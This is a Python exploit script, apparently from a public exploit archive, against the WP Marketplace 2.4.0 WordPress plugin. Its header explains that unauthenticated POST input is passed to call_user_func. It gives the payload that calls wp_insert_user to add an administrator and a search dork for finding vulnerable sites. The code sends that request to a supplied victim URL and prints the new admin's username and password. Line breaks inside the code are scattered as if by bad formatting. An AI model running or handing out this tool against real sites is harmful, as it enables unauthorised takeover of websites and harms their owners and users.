#!/usr/bin/python
#
# Exploit Name: WP Marketplace 2.4.0 Remote Command Execution
#
# Vulnerability discovered by Kacper Szurek (http://security.szurek.pl)
#
# Exploit written by Claudio Viviani
#
#
#
# --------------------------------------------------------------------
#
# The vulnerable function is located on "wpmarketplace/libs/cart.php" file:
#
# function ajaxinit(){
# if(isset($_POST['action']) && $_POST['action']=='wpmp_pp_ajax_call'){
# if(function_exists($_POST['execute']))
# call_user_func($_POST['execute'],$_POST);
# else
# echo __("function not defined!","wpmarketplace");
# die();
# }
#}
#
# Any user from any post/page can call wpmp_pp_ajax_call() action (wp hook).
# wpmp_pp_ajax_call() call functions by call_user_func() through POST data:
#
# if (function_exists($_POST['execute']))
# call_user_func($_POST['execute'], $_POST);
# else
# ...
# ...
# ...
#
# $_POST data needs to be an array
#
#
# The wordpress function wp_insert_user is perfect:
#
# http://codex.wordpress.org/Function_Reference/wp_insert_user
#
# Description
#
# Insert a user into the database.
#
# Usage
#
# <?php wp_insert_user( $userdata ); ?>
#
# Parameters
#
# $userdata
# (mixed) (required) An array of user data, stdClass or WP_User object.
# Default: None
#
#
#
# Evil POST Data (Add new Wordpress Administrator):
#
# action=wpmp_pp_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator
#
# ---------------------------------------------------------------------
#
# Dork google: index of "wpmarketplace"
#
# Tested on WP Markeplace 2.4.0 version with BackBox 3.x and python 2.6
#
# Http connection
import
urllib, urllib2, socket
#
import
sys
# String manipulator
import
string, random
# Args management
import
optparse
# Check url
def
checkurl(url):
if
url[:
8
] !
=
"https://"
and
url[:
7
] !
=
"http://"
:
print
(
'[X] You must insert http:// or https:// procotol'
)
sys.exit(
1
)
else
:
return
url
# Check if file exists and has readable
def
checkfile(
file
):
if
not
os.path.isfile(
file
)
and
not
os.access(
file
, os.R_OK):
print
'[X] '
+
file
+
' file is missing or not readable'
sys.exit(
1
)
else
:
return
file
def
id_generator(size
=
6
, chars
=
string.ascii_uppercase
+
string.ascii_lowercase
+
string.digits):
return
''.join(random.choice(chars)
for
_
in
range
(size))
banner
=
"""
___ ___ __
| Y .-----.----.--| .-----.----.-----.-----.-----.
|. | | _ | _| _ | _ | _| -__|__ --|__ --|
|. / \ |_____|__| |_____| __|__| |_____|_____|_____|
|: | |__|
|::.|:. |
`--- ---'
___ ___ __ __ __
| Y .---.-.----| |--.-----| |_.-----| .---.-.----.-----.
|. | _ | _| <| -__| _| _ | | _ | __| -__|
|. \_/ |___._|__| |__|__|_____|____| __|__|___._|____|_____|
|: | | |__|
|::.|:. |
`--- ---'
WP Marketplace
R3m0t3 C0d3 Ex3cut10n
(Add WP Admin)
v2.4.0
Written by:
Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
commandList
=
optparse.OptionParser(
'usage: %prog -t URL [--timeout sec]'
)
commandList.add_option(
'-t'
,
'--target'
, action
=
"store"
,
help
=
"Insert TARGET URL: http[s]://www.victim.com[:PORT]"
,
)
commandList.add_option(
'--timeout'
, action
=
"store"
, default
=
10
,
type
=
"int"
,
help
=
"[Timeout Value] - Default 10"
,
)
options, remainder
=
commandList.parse_args()
# Check args
if
not
options.target:
print
(banner)
commandList.print_help()
sys.exit(
1
)
host
=
checkurl(options.target)
timeout
=
options.timeout
print
(banner)
socket.setdefaulttimeout(timeout)
username
=
id_generator()
pwd
=
id_generator()
body
=
urllib.urlencode({
'action'
:
'wpmp_pp_ajax_call'
,
'execute'
:
'wp_insert_user'
,
'user_login'
: username,
'user_pass'
: pwd,
'role'
:
'administrator'
})
headers
=
{
'User-Agent'
:
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'
}
print
"[+] Tryng to connect to: "
+
host
try
:
req
=
urllib2.Request(host
+
"/"
, body, headers)
response
=
urllib2.urlopen(req)
html
=
response.read()
if
html
=
=
"":
print
(
"[!] Account Added"
)
print
(
"[!] Location: "
+
host
+
"/wp-login.php"
)
print
(
"[!] Username: "
+
username)
print
(
"[!] Password: "
+
pwd)
else
:
print
(
"[X] Exploitation Failed :("
)
except
urllib2.HTTPError as e:
print
(
"[X] "
+
str
(e))
except
urllib2.URLError as e:
print
(
"[X] Connection Error: "
+
str
(e))